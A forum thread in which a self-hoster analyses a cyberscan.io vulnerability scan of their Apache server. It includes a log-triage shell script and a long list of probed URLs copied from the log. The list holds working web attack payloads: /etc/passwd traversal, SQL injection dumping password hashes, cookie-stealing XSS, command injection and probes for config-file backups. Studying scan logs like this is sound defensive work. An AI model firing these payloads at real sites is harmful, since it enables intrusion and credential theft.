Cyberscan

Tonin
Just sharing an experience that is out of the ordinary for me: my http/https logs show a visit from a "cyberscan.io" coming from a Google Cloud IP.
whois.com/whois says (among other things) *** The IP addresses under this Org-ID are in use by Google Cloud customers ***
It lasted almost an hour and a half, with 76959 https requests and 68714 http requests. I have nothing on the ssh port.
Coincidentally, 5 minutes before it started, I had been curious enough to go and look at the alteration of the Google search result for "total". The alteration was already no longer visible.
That said, port scans must be legion on today's internet.
Edited by Tonin on 02/09/2022 at 11:19
Mageia 9 | > | Mageia 5 - 32bits - LXDE - Compiz ; ... Mandriva ; ... power pack, Mandrake 7.0 |

Papoteur
What do you call "the alteration" of the result?

squid-f
So I understand that you have ports 80 and 443 (maybe even 22?) open to the outside. Which applications use these ports?
If you have an apache or nginx server, I advise you to enable Fail2ban with the filters suited to your needs.
You can also configure your firewall to block IPs reported as "malicious" right away:
https://wiki.mageia.org/en/Pare-feu-fr#Liste_noire_des_m.C3.A9chants_de_la_propri.C3.A9t.C3.A9_intellectuelle_signal.C3.A9s_par_la_communaut.C3.A9
Cheers

Tonin
> What do you call "the alteration" of the result?
Sorry, let me clarify: the alteration is a Google search result for "total" that temporarily showed a hijacked description of the company TotalEnergies. For example as described in this France Inter article
The only link between that event and my scan is the Google search and a Google Cloud address crawling the site. It may be far-fetched, but at first glance I thought of a search on my site being triggered by a system that could have built the description hijack in the search results. The article mentioned raises other ideas that could have led to this "indexing bug"...
Paranoia is good for imagining the worst and preparing for it, but you shouldn't overdo it either! After reading the article, I am already putting my idea into perspective. However, I don't know what this Cyberscan was looking for, perhaps rather one of the vulnerabilities listed in its catalogue (of some 70000 lines...). The routine of certain hackers? The hosting on Google Cloud perhaps deserves an abuse report to the platform.
I use apache, mainly to host a photo gallery. And since the scan ended up in the gallery, it triggered a spike in visits. The gallery states that it refuses robots. Which were obviously looking for scripts in the subdirectories... that makes a lot of drawers to explore!
As for Fail2Ban, thanks for the suggestion and the wiki article. I didn't reinstall it during the previous Mageia installation... to be looked into.
Mageia 9 | > | Mageia 5 - 32bits - LXDE - Compiz ; ... Mandriva ; ... power pack, Mandrake 7.0 |
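
Added example (not part of any post in this thread): one way to see what such a scan was looking for, by extracting the probed path endings under a prefix from an Apache ssl_request_log and sorting them into rough probe classes. It assumes the request path is the 7th whitespace-separated field; the sample lines, the addresses, the function names and the category names are constructed, and /debut/de/chemin/ is a placeholder prefix.

```shell
#!/bin/sh
# Added example: triage of scanner probes found in an Apache ssl_request_log.
# Assumption: request path is field 7 ("[date tz] ip proto cipher "METHOD path HTTP/x" bytes").

# Constructed sample log (192.0.2.10 and 198.51.100.7 are documentation addresses).
sample_log() {
cat <<'EOF'
[02/Sep/2022:10:01:00 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/.env HTTP/1.1" 196
[02/Sep/2022:10:01:00 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/.env HTTP/1.1" 196
[02/Sep/2022:10:01:01 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/.git/config HTTP/1.1" 196
[02/Sep/2022:10:01:01 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/config.php.bak HTTP/1.1" 196
[02/Sep/2022:10:01:02 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/download.php?file=etc/passwd HTTP/1.1" 196
[02/Sep/2022:10:01:02 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 196
[02/Sep/2022:10:01:03 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/index.php?error=<script>foo</script> HTTP/1.1" 196
[02/Sep/2022:10:01:03 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E HTTP/1.1" 196
[02/Sep/2022:10:01:04 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/comments.php?image_id=1' HTTP/1.1" 196
[02/Sep/2022:10:01:04 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/browse.php?pk=-1%20union%20select%201234567,2-- HTTP/1.1" 196
[02/Sep/2022:10:01:05 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/hints.pl?|id| HTTP/1.1" 196
[02/Sep/2022:10:01:05 +0200] 192.0.2.10 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /debut/de/chemin/index.php HTTP/1.1" 5120
[02/Sep/2022:10:02:00 +0200] 198.51.100.7 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 1150
EOF
}

# Print the deduplicated path endings requested under PREFIX (log on stdin).
extract_suffixes() {
    awk -v p="$1" 'index($7, p) == 1 { print substr($7, length(p) + 1) }' |
        LC_ALL=C sort -u
}

# Tag each path ending (stdin) with a rough probe class: "class<TAB>ending".
classify() {
    awk -v q="'" '
    {
        s = tolower($0)
        # Undo the percent-encodings used to hide "%", "<", ">", ".", "/" and the quote.
        gsub(/%25/, "%", s)                       # double encoding: %252f -> %2f
        gsub(/%3c/, "<", s); gsub(/%3e/, ">", s)
        gsub(/%2e/, ".", s); gsub(/%2f/, "/", s)
        gsub(/%27/, q, s)

        if      (s ~ /<script/)                          c = "xss"
        else if ((s ";") ~ /[;|](id|cat|ls)[^a-z]/)      c = "cmd-injection"
        else if (s ~ /\.\.\// || s ~ /etc\/passwd/ || s ~ /web-inf\//)
                                                         c = "file-read"
        else if (s ~ /union.*select/ || substr(s, length(s)) == q)
                                                         c = "sqli"
        else if (("/" s) ~ /\/\.(env|git|svn|hg|ssh|htpasswd)/ ||
                 s ~ /\.(bak|old|orig|save|swp|sql|key|pem)$/)
                                                         c = "secret-file"
        else                                             c = "other"
        print c "\t" $0
    }'
}

# Count endings per class, most frequent first.
summarize() {
    awk -F '\t' '{ n[$1]++ } END { for (c in n) print n[c], c }' |
        LC_ALL=C sort -k1,1nr -k2,2
}

# Usage: probe_report PREFIX < /var/log/httpd/ssl_request_log
probe_report() {
    extract_suffixes "$1" | classify | summarize
}

# Stand-alone run on the constructed sample.
sample_log | probe_report /debut/de/chemin/
```

The classes are coarse on purpose: they show which families of probes a catalogue contains, not whether any request succeeded, which the response status in access_log would have to confirm.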

Tonin
The catalogue of paths to test could therefore have had around 1500 lines.
cat /var/log/httpd/ssl_request_log | grep -F 'inc/htmlarea/plugins/FileManager/standalonemanager.php' | wc -l
cat /var/log/httpd/ssl_request_log | grep -F 'service/index_pri.php' | wc -l
cat /var/log/httpd/ssl_request_log | grep -F 'zml.cgi?file=../../../../../../../../../../../../etc/passwd%00' | wc -l
cat /var/log/httpd/ssl_request_log | grep -F 'webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd' | wc -l
# cat /var/log/httpd/ssl_request_log | grep webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD | wc -l # !!! error because of the &
cat /var/log/httpd/ssl_request_log | grep -F 'webcart.cgi?CONFIG=mountain' | wc -l
cat /var/log/httpd/ssl_request_log | grep -F 'xBoard/main.php' | wc -l
cat /var/log/httpd/ssl_request_log | grep -F 'xboard/main.php' | wc -l
cat /var/log/httpd/ssl_request_log | grep -F 'upload/index.php' | wc -l
Taking the filtering from the other end, that is, by the beginning of the explored path, there is a good chance of getting a potentially exhaustive list of the path endings tested:
cat /var/log/httpd/ssl_request_log | grep /debut/de/chemin/ | awk '{print $7}' > cyberscan_debut-de-chemin.lst
Indeed, for the path beginning tested, 2848 endings are extracted, deduplicated to 1420 lines: (I hope the forum isn't weighed down too much by this kind of message)
settings.php.save
settings.php.swp
settings.php.temp
settings.php.tmp
settings.php~
settings.py
setup.php
setup.php3?next=1
setup/index.php
setup/install.php
setup/setup.php
sfr.key
sfr.pem
sfr.sql
sftp-config.json
shell/sitecore.version.xml
shop.cgi
shop.pl/page=;cat%20shop.pl|
shopper.cgi?newpage=../../../../../../etc/passwd
shopplus.cgi
shopplus.cgi_1368008666
shopplus.cgi_979877740
shoutbox.php
show_profile.php
showcase.action
showcat.php?cat=1'
showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--
showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
showHome.do
showproduct.php?product=1'
showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23
signin
signin.php
signing_system-admin/index.php
site.php
site.sql
site/index.php/admin/login/
site/login.php
sitemanager.xml
sitemap.php?id_site=<script>alert(/openvasvt/)</script>
sitemap.xml
sites/all/modules/ckeditor/CHANGES.md
sites/all/modules/ckeditor/ckeditor.js
sites/all/modules/fckeditor/_whatsnew.html
sites/all/modules/fckeditor/fckeditor.js
sites/all/modules/fckeditor/fckeditor/_whatsnew.html
sites/all/modules/fckeditor/fckeditor/fckeditor.js
sites/default/files/.ht.sqlite
sites/default/private/files/backup_migrate/scheduled/test.txt
skins/default.php?dir_inc=../etc/passwd%00
skins/default.php?dir_inc=/etc/passwd%00
smarty.php
snpfiltered.pl?t=c&u=<script>foo</script>
software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
source/index.php
spip.php
spywall/login.php
sql.sql
src/apps/pom.xml
src/index.php
src/login.php
src/main.php
src/pom.xml
src/src/site/xdoc/index.xml
src/Symfony/Component/Console/CHANGELOG.md
sscd_suncourier.pl
sscd_suncourier.pl_320575721
sscd_suncourier.pl_666321881
ssl_check.php
star57.cgi?download=;id|
start
start/index.php
startPage
static/index.html
status.php
status.php3
story.pl?next=../../../../../etc/passwd%00
struts-cookbook/example/HelloWorld.action
struts-cookbook/index.action
struts-cookbook/showcase.action
struts-cookbook/Welcome.do
struts-examples/example/HelloWorld.action
struts-examples/index.action
struts-examples/showcase.action
struts-examples/Welcome.do
struts2-basic/example/HelloWorld.action
struts2-basic/index.action
struts2-basic/showcase.action
struts2-basic/Welcome.do
struts2-blank/example/HelloWorld.action
struts2-core-apidocs/help-doc.html
struts2-core-apidocs/index-all.html
struts2-core-apidocs/overview-summary.html
struts2-mailreader/Welcome.do
struts2-portlet/example/HelloWorld.action
struts2-portlet/index.action
struts2-portlet/showcase.action
struts2-portlet/Welcome.do
struts2-rest-showcase/example/HelloWorld.action
struts2-rest-showcase/index.action
struts2-rest-showcase/showcase.action
struts2-rest-showcase/Welcome.do
struts2-showcase/showcase.action
stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23
style-underground/search
styles.php?toroot=/etc/passwd%00
symfony/web/index.php/auth/login
symphony/
system/admin/modules.php
system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;
SystemInfo
tao/install/
team.rc5-72.php
telescope
telescope/requests
temp.sql
Templates/default/index_logged.php?main_loaded=1&cur_module=/etc/passwd
templates/system/css/editor.css
test.php
test.php?mode=phpinfo
themes/admin/default/modules/show.php
themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E
themes/program/themesettings.inc.php?themesdir=/etc/passwd%00
thread.php
tiki-index.php
tiki-install.php
title.html
titleBar.php
tmpl/news_main.htm
tombstone.cfm?ProfileID=<script>foo</script>
tools.php?file_id=reset_password
topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20vtstrings%5b%22lowercase_rand%22%5d%20%2b%20%22)%3c%2fscript%3e
translate.sql
triton/login/pages/loginPage.jsf
typo3_src/ChangeLog
typo3/index.php
typo3/sysext/opendocs/composer.json
typo3/sysext/recordlist/composer.json
typo3/sysext/sys_note/composer.json
typo3/sysext/t3editor/composer.json
update.php
upload.php
upload/account-login.php
upload/index.php
upstnt.php?zid=1&lid=1&cartid='
urheber.php?name=../../../../../../../../../../etc/passwd%00
user.cgi?cmd=show&page=/../../../etc/passwd
user.php
user/index.php
user/login
userlogin!default.action
userlogin!doDefault.action
users.sql
users/login.php
usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
utils.js
v1/settings/first-login
v3/settings/first-login
vendor/plugins/fckeditor/public/javascripts/_whatsnew.html
vendor/plugins/fckeditor/public/javascripts/fckeditor.js
viart_shop.xml
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_user.php?list=1&letter=&sort_by='select
view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9
view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category
view/TWiki/WebHome
viewcvs.cgi/?cvsroot=<script>foo</script>
viewer
viewfaqs.php
viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0
views/login
viewstory.php
viewvc.cgi/
viewvc/
viralator.cgi
viralator.cgi_1247142494
viralator.cgi_1828062527
vpasswd.cgi
vpasswd.cgi_1051800675
vpasswd.cgi_461946153
WackoWiki
wcf/acp/dereferrer.php?url=javascript:alert(document.cookie);
web_reports/cgi-bin/InfoStation.cgi?mod=login&func=login&lang_code=en
Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html
WEB-INF../web.xml
web-inf../web.xml
WEB-INf./web.xml
WEB-INF./web.xml
web-inf./web.xml
WEB-INF/local.properties
WEB-INF/web.xml
web-inf/web.xml
WEB-INF/webapp.properties
web.config
web.xml
Web/?
web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
web/app_dev.php/_configurator/step/0
web/guest
web/help.php
web/login
web/magmi.php
webacc?User.interface=/../webacc/wml
webadmin.php?show=%2Fetc%2Fpasswd
webapp.properties
webapp/home.html?0
webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
webFileBrowser.php
weblibs.pl
webplus?about
webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
Welcome.do
welcome.do
welcome/index.html
wiki.cgi
wiki.php
wiki.php/<script>foo</script>
wiki/index.php
WikiHome
WinSCP.ini
winscp.ini
wizard/index.php?type=';phpinfo();//
wizard/url.php?${phpinfo()}=1
wonderdesk.cgi
wp-admin/install.php
wp-admin/setup-config.php
wp-config.php.backup
wp-config.php.bak
wp-config.php.bkp
wp-config.php.copy
wp-config.php.old
wp-config.php.orig
wp-config.php.save
wp-config.php.swp
wp-config.php.temp
wp-config.php.tmp
wp-config.php~
wp-content/plugins/ckeditor-for-wordpress/ckeditor/CHANGES.md
wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js
wp-content/plugins/fckeditor-for-wordpress/fckeditor/_whatsnew.html
wp-content/plugins/fckeditor-for-wordpress/fckeditor/fckeditor.js
wp-links-opml.php
wp-login.php
wrx.cgi
ws_ftp.ini
WS_FTP.INI
WS_FTP.ini
wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
WW/cwiki.apache.org/WW/guides.html
WW/cwiki.apache.org/WW/home.html
www/admin/index.php
wwwboard.html
x_news.php
xymon.html
YaBB.pl
zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E
zml.cgi?file=../../../../../../../../../../../../etc/passwd%00
zp-core/admin.php?a="><script>alert(/xss-test/)</script>